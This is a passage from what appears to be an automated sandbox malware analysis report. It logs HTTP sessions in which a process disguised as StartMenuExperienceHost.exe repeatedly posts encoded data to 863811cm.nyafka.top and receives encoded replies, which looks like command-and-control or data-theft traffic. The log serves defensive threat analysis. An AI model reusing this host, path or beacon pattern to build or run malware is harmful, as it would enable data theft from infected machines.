                                                                Data Ascii: PXX^T[]Q^ZUXQSZ[W_XYUSQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+>?<90'-8+6<";')#9U $?P0-S)+8B"0*;#Y$/\*9
                                                                Oct 11, 2024 01:37:17.802850962 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:18.047070026 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=egt0DinshoP9k4vgNQYl%2BzAKxx2RIWfdjAasyqANGCBa17ixwL9%2BfNMfr61yw0X%2FYSv3NBqvxjMPb%2BT2IWr7WS%2Fqi8wSg8P1mFWnBrtGGRO6twqRgMZarjGEpxtoT9Md7mBk4GZe"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ffdfee60ca9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 3d 07 00 1f 20 10 01 12 2c 08 30 5b 2a 3e 3d 07 3f 0f 28 00 26 0a 37 5d 2c 2f 36 0f 36 38 37 04 28 2c 2e 5a 33 02 27 5d 3f 1b 2a 51 03 1b 39 1c 3c 33 2c 08 28 0c 31 5e 3c 0b 31 5e 30 0d 21 06 29 13 21 54 25 3e 0f 04 23 21 06 1c 2a 02 2c 0d 38 2b 2f 40 2a 38 21 01 23 3b 2a 5f 08 13 39 57 29 28 23 0e 22 37 29 5d 23 2d 15 55 21 07 2a 1a 3d 17 25 09 27 33 38 59 2f 22 09 00 34 06 23 50 23 2c 03 0e 20 2d 2c 10 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'= ,0[*>=?(&7],/6687(,.Z3']?*Q9<3,(1^<1^0!)!T%>#!*,8+/@*8!#;*_9W)(#"7)]#-U!*=%'38Y/"4#P#, -,%("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                79192.168.2.550060188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:17.351584911 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:17.706702948 CEST2584OUTData Raw: 50 5c 5d 54 54 5d 5d 56 5e 5a 55 58 51 54 5a 58 57 58 58 59 55 50 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]TT]]V^ZUXQTZXWXXYUPQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]<$+)3S%3?4";Z( 6!7(0>.)(@5'*+#Y$/\*%
                                                                Oct 11, 2024 01:37:17.794100046 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:18.083966970 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpcX%2BJ2QVuAu0dKg42pln67jpGGMYkVvRl1DjNCv8gF735clnD5H0Bj3xzIQGHclyFG4OcnzJGLYcsnNt4ZGslZ4UXV2vc2Sd%2FXRUI161Xplllv2loyJ6%2BE9QmuG%2BshkICJoqQB0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ffdeec08ca1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:18.160830021 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:18.254597902 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:18.254918098 CEST2004OUTData Raw: 55 5d 5d 55 51 59 5d 54 5e 5a 55 58 51 52 5a 5d 57 58 58 5a 55 5c 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]UQY]T^ZUXQRZ]WXXZU\QSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<- >*/2,<C?#; ?9V!$?W3=1>85(*;#Y$/\*
                                                                Oct 11, 2024 01:37:18.549751043 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bq3FtoclHOCJJfTNdFaxLGXIPYTL6w%2FY3UdrqPt5PAVsm2vEd0fn8ZSGOju8TAtLh4l5d0PEA7LC0TDQh96TqDlUse0ExCIx5i%2BaVGxN9X4aoIXwR8z18bh00%2BpIBZs0K0tApbkg"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7000c99b8ca1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 04 29 07 25 0d 20 00 2c 05 38 32 38 13 29 3e 3a 15 3c 22 33 10 32 27 27 5d 2e 05 29 57 36 28 2c 58 3e 3c 04 5b 26 3c 09 5a 3c 31 2a 51 03 1b 39 5b 3f 23 27 1e 28 0b 26 06 28 22 0b 5f 27 30 3a 1b 3d 5b 21 57 33 3e 31 01 22 0f 24 1c 2a 2c 20 0c 2c 2b 0d 43 3e 06 26 5c 23 2b 2a 5f 08 13 3a 0c 29 28 3b 08 22 19 3a 00 36 3e 27 1f 36 39 3a 50 2a 07 21 09 30 23 2c 14 3b 1c 28 12 34 3f 2c 0f 35 3c 04 55 34 3d 0e 11 31 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$)% ,828)>:<"32''].)W6(,X><[&<Z<1*Q9[?#'(&("_'0:=[!W3>1"$*, ,+C>&\#+*_:)(;":6>'69:P*!0#,;(4?,5<U4=1"_")Q?TR0
                                                                Oct 11, 2024 01:37:18.666115046 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:18.760725975 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:18.760927916 CEST2004OUTData Raw: 50 5f 5d 5f 51 59 58 56 5e 5a 55 58 51 5c 5a 5b 57 50 58 54 55 57 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_]_QYXV^ZUXQ\Z[WPXTUWQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\<4]?)#T&-3<?5;?<3)W 4;P3=T=+4!;>#Y$/\*
                                                                Oct 11, 2024 01:37:19.056296110 CEST754INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CFDiTykNIpS5%2FYsgINXh3X994vpSfuZ65p9Jprbu93Lmo5jaeDjOwM%2Fo3o%2FNPem%2F6Y45dFJky221VJmUWC1DVn1PRsuJncfT%2F9sXJvnPV9q%2FDmu2iiRUdObw0T%2FqMuDe7lDGo%2BIb"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7003fc978ca1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 3e 00 21 0e 34 3d 20 05 3b 0f 0e 5a 3e 3d 00 5c 29 21 33 5b 24 37 3f 5f 2c 3c 3d 11 22 15 27 00 3d 2c 22 11 27 5a 28 03 3c 21 2a 51 03 1b 39 1c 3f 0d 24 09 2b 0c 08 03 28 54 25 15 27 20 21 42 2b 2e 35 51 27 00 08 58 23 31 20 53 3d 05 33 1f 38 02 3c 18 2a 5e 21 05 20 3b 2a 5f 08 13 39 54 29 2b 28 57 35 27 3d 1a 22 04 24 0b 22 17 2e 50 3f 3a 3a 13 27 1d 0a 17 3b 1c 0e 13 23 01 27 57 36 3f 35 0b 37 3d 23 00 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>!4= ;Z>=\)!3[$7?_,<="'=,"'Z(<!*Q9?$+(T%' !B+.5Q'X#1 S=38<*^! ;*_9T)+(W5'="$".P?::';#'W6?57=#&"_")Q?TR0
                                                                Oct 11, 2024 01:37:19.160331011 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:19.254532099 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:19.254708052 CEST2004OUTData Raw: 55 5e 5d 54 54 59 58 5f 5e 5a 55 58 51 53 5a 5b 57 58 58 58 55 54 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]TTYX_^ZUXQSZ[WXXXUTQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9((<&=,(%/68?\+#!'7R&-:)!"/>;#Y$/\*9
                                                                Oct 11, 2024 01:37:19.556806087 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zPIioAj24xQrob6OcFkFxH6VGYVpPytfnarlFSdAM3EoQjvjDPbmrgwupAUfdBKvvi2Jph4%2Bw4fP6YyTuz31knoSOkY2TjBGQZVV67GxxDicJGoezx5FUIhrBfdkWofB%2B4QvLAL8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70070fe68ca1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 3d 39 2d 0e 34 3e 3f 5d 38 31 30 5b 2a 3e 2d 05 2b 22 2b 58 31 34 15 58 39 2c 2e 0a 36 3b 28 59 28 3c 3e 58 33 02 30 01 3f 31 2a 51 03 1b 39 1c 2b 20 28 08 29 22 08 04 2b 32 21 58 27 1d 36 18 3e 03 08 0e 27 3e 3e 5f 21 21 28 56 3d 05 27 1d 2f 3b 27 08 3d 38 21 02 37 11 2a 5f 08 13 39 51 2a 01 3f 08 35 09 25 58 36 3d 3b 53 22 29 32 56 2a 07 31 09 27 33 3c 5f 2f 22 06 12 37 01 2b 1c 36 02 0c 1d 23 2e 2f 04 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$=9-4>?]810[*>-+"+X14X9,.6;(Y(<>X30?1*Q9+ ()"+2!X'6>'>>_!!(V='/;'=8!7*_9Q*?5%X6=;S")2V*1'3<_/"7+6#./1"_")Q?TR0
                                                                Oct 11, 2024 01:37:19.660137892 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1964
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:19.754437923 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:19.754602909 CEST1964OUTData Raw: 55 5f 5d 5f 51 5c 5d 52 5e 5a 55 58 51 55 5a 5a 57 59 58 5d 55 53 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_]_Q\]R^ZUXQUZZWYX]USQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+= X+9 1/+7"<?36!$0>=S*(!W Z=;#Y$/\*%
                                                                Oct 11, 2024 01:37:20.056318998 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vLKqRFwp%2Fy1mlD%2BbeVIx%2BrHy4%2FUoiTyraaPjHazH8bX%2B1tpP0W3fZ0lM5UkDw%2FvJnmYzcZFqGxw6aAQc1OyTWQFKwQQS5PGNqNCB8Nojd16YEGniNvbvvcKekzB958C5VAi6y7ao"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a700a2b378ca1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 2a 5f 26 55 37 3e 02 03 3b 31 0e 58 2b 3d 26 5e 2b 0f 34 02 25 34 3f 58 3a 3c 39 1f 21 3b 02 59 3e 02 3e 5b 27 2f 2f 5c 2b 21 2a 51 03 1b 39 59 3c 23 2f 13 3c 0c 3a 07 28 32 3a 05 30 0d 3e 1d 2a 2d 21 1c 24 07 26 16 23 21 05 0e 3d 2f 3f 57 2f 2b 37 42 29 28 0f 04 20 2b 2a 5f 08 13 39 51 2a 28 0a 57 20 34 36 01 21 03 28 0e 36 5f 29 08 3d 2a 3e 1d 33 55 24 59 2d 32 3c 5a 34 01 0a 0d 23 3f 35 0c 37 04 2b 04 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'*_&U7>;1X+=&^+4%4?X:<9!;Y>>['//\+!*Q9Y<#/<:(2:0>*-!$&#!=/?W/+7B)( +*_9Q*(W 46!(6_)=*>3U$Y-2<Z4#?57+1"_")Q?TR0
                                                                Oct 11, 2024 01:37:20.160743952 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:20.254996061 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:20.255131960 CEST2004OUTData Raw: 50 5b 5d 5e 51 5f 58 5e 5e 5a 55 58 51 5d 5a 5e 57 58 58 5c 55 56 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]^Q_X^^ZUXQ]Z^WXX\UVQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:++<0&X0A(5!(8(9W!'?W'"=8G6<)#Y$/\*
                                                                Oct 11, 2024 01:37:20.548269033 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PBn%2BEVIFGcIwilh2Es74%2B6g%2F8K41Q0kdU5SeyGllZqt3Npwuz3YYgzcs06b8J0tBPVYuMgrlANxqvV6qJ0I8onG7ENWaZ1yVSqQBXKgtzrKQ%2FWFpE0kAiNoqzrceKKyHL7q3s19z"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a700d4e508ca1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 2a 39 22 53 23 3d 33 5b 3b 57 33 01 29 3d 2d 04 2b 57 3b 58 25 34 16 07 2e 5a 39 54 36 38 28 1a 29 02 04 59 24 2f 3b 11 3c 0b 2a 51 03 1b 3a 03 3e 23 2f 54 28 22 2d 16 28 1c 31 59 27 0a 26 19 29 5b 31 1d 24 3e 22 16 21 0f 2c 1c 3d 05 20 0f 38 3b 20 1d 2a 2b 39 00 34 3b 2a 5f 08 13 39 57 2a 16 37 08 21 34 35 59 21 13 24 0d 20 39 2a 53 3d 00 3a 1c 24 23 0d 01 3b 31 3c 10 23 2f 28 09 22 3c 04 57 34 2e 20 10 32 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'*9"S#=3[;W3)=-+W;X%4.Z9T68()Y$/;<*Q:>#/T("-(1Y'&)[1$>"!,= 8; *+94;*_9W*7!45Y!$ 9*S=:$#;1<#/("<W4. 28"_")Q?TR0
                                                                Oct 11, 2024 01:37:20.660379887 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                80192.168.2.550061188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:18.217456102 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:18.566171885 CEST2584OUTData Raw: 55 5f 58 5d 54 59 58 52 5e 5a 55 58 51 56 5a 5f 57 51 58 5f 55 5c 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_X]TYXR^ZUXQVZ_WQX_U\Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\+.,Y>)0&>,D*5+5#Y?0=S4&>!V*+51;(;#Y$/\*-
                                                                Oct 11, 2024 01:37:18.664824963 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:18.921839952 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYjZEl2WkxoEIQh0po5Qec5Ift9Tfq1%2F7MpD8oF6uKnz63nCIyRFG5SvG%2BqJTOrmnFaJl2L1zl%2BjLd3ftzpVPuU8VdBalk8lBLFSSIfKg%2FNe3VSxGRajugx%2FUCIF5xQQNHfeJ3Ah"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70035a6d8cb4-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                81192.168.2.550062188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:19.052320957 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:19.409821987 CEST2584OUTData Raw: 50 52 5d 5c 54 5b 58 54 5e 5a 55 58 51 57 5a 5a 57 5f 58 5a 55 57 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]\T[XT^ZUXQWZZW_XZUWQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^(,\+9;R1;+5 58?X()S7'($=1*(B51(^(+#Y$/\*)
                                                                Oct 11, 2024 01:37:19.526020050 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:19.772439957 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U20POnMNxBqPC6aRvq3cxlnfQ%2FeIJGeT7nkw5%2BQk8Rp5NHRhVBf8HRmE52s3343gj2lqFZ8rQLZ19EGqGziklImXqO%2BtRcAzJlgH8wg3GhTYubjDuc29hcZkst7z7l0A%2BMiMakMJ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7008b8d10f7f-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                82192.168.2.550063188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:19.896559000 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:20.253757954 CEST2584OUTData Raw: 55 5a 5d 5c 54 5e 5d 56 5e 5a 55 58 51 56 5a 5a 57 5f 58 5c 55 53 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
